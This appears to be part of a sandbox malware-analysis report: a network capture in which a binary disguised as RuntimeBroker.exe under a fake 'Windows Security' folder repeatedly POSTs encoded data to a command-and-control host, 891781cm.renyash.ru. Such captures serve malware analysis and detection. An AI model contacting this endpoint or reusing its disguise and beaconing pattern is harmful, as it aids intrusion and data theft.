                                                                                                                          Data Ascii: U^X\Z[T]UZTYQYUWX]\\YVR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?5 (:1=9])#Z&7!:$\$Y1'?$->\+=(S><#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:47.636909962 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:47.840444088 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:47 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wmmUpxVpYyn72X7lON%2Fw8XlmTNEDHpuw8VJbhBuOIZ5pXRPir7XJsKE7lMgRNaNrNBhAktS6Bmc4%2Bq3bWE7%2BBIHvzjI3WK7A0%2FhQLR4hoG0gYpIjY8srTZ%2BLnjHAhP3QFy4K0AC3"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64867c6e8c7d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4953&min_rtt=2013&rtt_var=6635&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=57176&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          140192.168.2.450147104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:47.962325096 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:48.321635008 CET1056OUTData Raw: 50 56 58 53 5a 5e 51 58 55 5a 54 59 51 5a 55 52 58 5b 5c 5f 59 56 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PVXSZ^QXUZTYQZURX[\_YVR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?1 8!X22=.#Y$:Q.$Y1'Z,;??*#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:48.415801048 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:48.671960115 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:48 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4kvae997tRfM5s3ROHkdBPfdch8HnPgfoOIfeEgO3WNK%2BlwtAzze0SjM6WQVQ%2BC39Qipz2sPjxKgunz4ZCQVvuCNMJxSATO0dgw4iv5ddB5A0eMVobMXGUUo%2FyjbhQfUnIhQ8D2"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf648b5e4fde97-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4723&min_rtt=1549&rtt_var=6930&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=54184&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          141192.168.2.450148104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:48.804750919 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:49.162657976 CET1048OUTData Raw: 55 51 5d 56 5f 5c 51 59 55 5a 54 59 51 5b 55 53 58 5b 5c 5f 59 5c 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQ]V_\QYUZTYQ[USX[\_Y\RS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]+24;!_2:)^'4--'$303^,.]?<T><#^!'^)?
                                                                                                                          Jan 1, 2025 04:23:49.248550892 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:49.505004883 CET811INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:49 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6THsgq2snDesC3XZdxE6jbsOt%2Bl9WpOL%2B0s6Qq4v%2BEFhMlgyky0nGhcnj2zsRYyk6Kuaao5QeO%2FOovV%2FI0FFPZr9ZjTRfRY1I0QO5TX5a9sElIytSD%2BgFWGMVy81EpWZ7MuYgXWP"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64908ed10c82-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2450&min_rtt=1699&rtt_var=2141&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=189266&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          142192.168.2.450149104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:50.202002048 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:50.553086042 CET1056OUTData Raw: 50 51 58 52 5a 5d 51 59 55 5a 54 59 51 52 55 5d 58 52 5c 5a 59 51 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQXRZ]QYUZTYQRU]XR\ZYQRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (%#=Z&=")>Z'B:V94'.P'Z/^/X;?.*#^!'^)
                                                                                                                          Jan 1, 2025 04:23:50.646681070 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:50.825826883 CET799INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:50 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Q1p8WYlK5W0oWdAjuQNzrU8oxEFpmC1Bb11x1ZalbOAbwI0fV8mFFqIPvHlmUujdXcgxhemiNSd7ImBDVNRePcArVXeBH6IcOzJQy5iNtjMgWqsj3oL2ZJ2psT0IGUNuc75z4ZX"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64994f9b4326-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3218&min_rtt=1803&rtt_var=3506&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=111238&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          143192.168.2.450150104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:50.944077969 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:51.303081989 CET1048OUTData Raw: 50 52 5d 50 5a 57 51 5d 55 5a 54 59 51 5b 55 5d 58 5c 5c 59 59 5c 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PR]PZWQ]UZTYQ[U]X\\YY\R[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#)/Y!(1Z2:(>#$%,48_0?*P0,=?<7>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:51.385397911 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:51.609292030 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:51.652605057 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:51 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVjptdX1d5je3o3OviGe03dHyg4JFx1HZve%2BagUvKZIFcJNUj7AWgi0jul%2BMAqdQR%2BtjiIUsONKXrNzrlqY2L3ZNnf1OYilNMJ9cbLmXrGkkVjopk0iRmfKVULex6BRh0jCM7HLv"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf649dea4a1902-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2632&min_rtt=1503&rtt_var=2823&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=138519&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          144192.168.2.450151104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:51.778268099 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          145192.168.2.450152104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:51.919064999 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:52.274538040 CET1780OUTData Raw: 55 52 5d 50 5f 5e 54 5f 55 5a 54 59 51 5f 55 52 58 59 5c 58 59 51 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UR]P_^T_UZTYQ_URXY\XYQR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ <>78>2=)$1:%?6$,//=4]+=<#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:52.382874012 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:52.659008026 CET963INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:52 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOr29UYNXBiNfN2cTFYyFH4PqONv0BQN2NddxcREdVZ7tR%2B4BEt4AVfAZoUEXY8BPKCxwehoBzyS%2BfDI%2F5Yw7qqAm2OcS3bei%2FQMO3L0%2BL%2FN%2BE%2BTUGSz6BT2yuBvsu769lmBFf53"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64a41af71a28-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3681&min_rtt=2011&rtt_var=4095&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=94953&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 1c 26 38 37 59 3c 07 35 05 38 01 37 12 32 59 2a 5c 25 30 33 06 25 58 3d 15 2e 38 23 00 3f 28 2b 5b 25 04 32 06 37 31 31 02 31 26 2e 5d 04 1d 25 11 2a 04 0c 1b 3c 11 26 03 3e 32 27 07 24 19 27 11 26 1a 0d 03 33 2e 21 05 22 32 0d 56 24 20 3f 0d 2b 3a 33 59 33 2d 00 57 37 00 2e 57 0d 12 21 0c 26 00 3e 0d 3e 32 20 56 20 2f 2c 0f 30 01 2b 51 30 05 30 12 21 2b 32 57 3e 3f 3f 03 22 51 39 50 27 5c 30 01 20 29 3e 05 36 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"&87Y<5872Y*\%03%X=.8#?(+[%27111&.]%*<&>2'$'&3.!"2V$ ?+:3Y3-W7.W!&>>2 V /,0+Q00!+2W>??"Q9P'\0 )>6#"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          146192.168.2.450153104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:52.108114004 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:52.465567112 CET1056OUTData Raw: 55 54 58 5d 5f 59 51 5c 55 5a 54 59 51 5e 55 5d 58 52 5c 55 59 55 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UTX]_YQ\UZTYQ^U]XR\UYURR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+#&1*/&4&9$_'1&<8;??=8R><#^!'^)3
                                                                                                                          Jan 1, 2025 04:23:52.558749914 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:52.826862097 CET799INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:52 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Cal1er7msNJ0QOvlXjawuAE2eVJkMbOaGmgHwqErHbHewGOfM3muaBZrT7FlSawS2zg8YcK6P7WD%2Bxdcad5zsi0LC4Hz3TkIieu%2BgsBV2H56u0tAESP%2BQJak5YAfCFDQeqs9b2Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64a53cb94258-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1760&rtt_var=756&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=680335&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                          Data Ascii: 41V[X
                                                                                                                          Jan 1, 2025 04:23:52.915451050 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          147192.168.2.450154104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:53.038706064 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:53.396958113 CET1056OUTData Raw: 55 55 58 54 5a 56 51 5f 55 5a 54 59 51 5f 55 53 58 5f 5c 55 59 55 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UUXTZVQ_UZTYQ_USX_\UYUR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?!\!;[22*.'Z'4.P,4+06T$Z?-. \== T=<#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:53.522478104 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:53.777937889 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:53 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAfT6Uxz0cXMoqUV3TQBMVXEt3VHEr%2BxJPXaQmHu5KHZ%2FfzuEeWQsLY9uVmqwwMW70gsPo3EDVZ2Bt4nX0myUVZc6hMpWgSmtwWMTJQYt4Xr%2FPgecyJ0yhQsmVUdVYCIzKM4ASFb"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64ab2a8e19bb-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3389&min_rtt=2034&rtt_var=3473&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=113371&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          148192.168.2.450155104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:53.911823988 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:54.257638931 CET1048OUTData Raw: 50 51 58 57 5f 5a 54 5a 55 5a 54 59 51 5b 55 51 58 52 5c 59 59 5c 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQXW_ZTZUZTYQ[UQXR\YY\RY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X)?![!;16(=('4=.7#$.T$<?Z/=?<=<#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:54.360271931 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:54.551717043 CET800INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:54 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jbimrBVl9XnLlhhlP8jWkhRu6bta6X4VGqMLst%2B5WGfGZEbsa3XvASHisJMSiQ3rTwRNBC7UfS9gbr3Gu6pOvnUumEOJRRR58ZxgEnFb4nQWBKPb1IHpMB5GESp55VMEahAhlhgR"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64b078728cca-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4147&min_rtt=1970&rtt_var=5094&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=75292&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


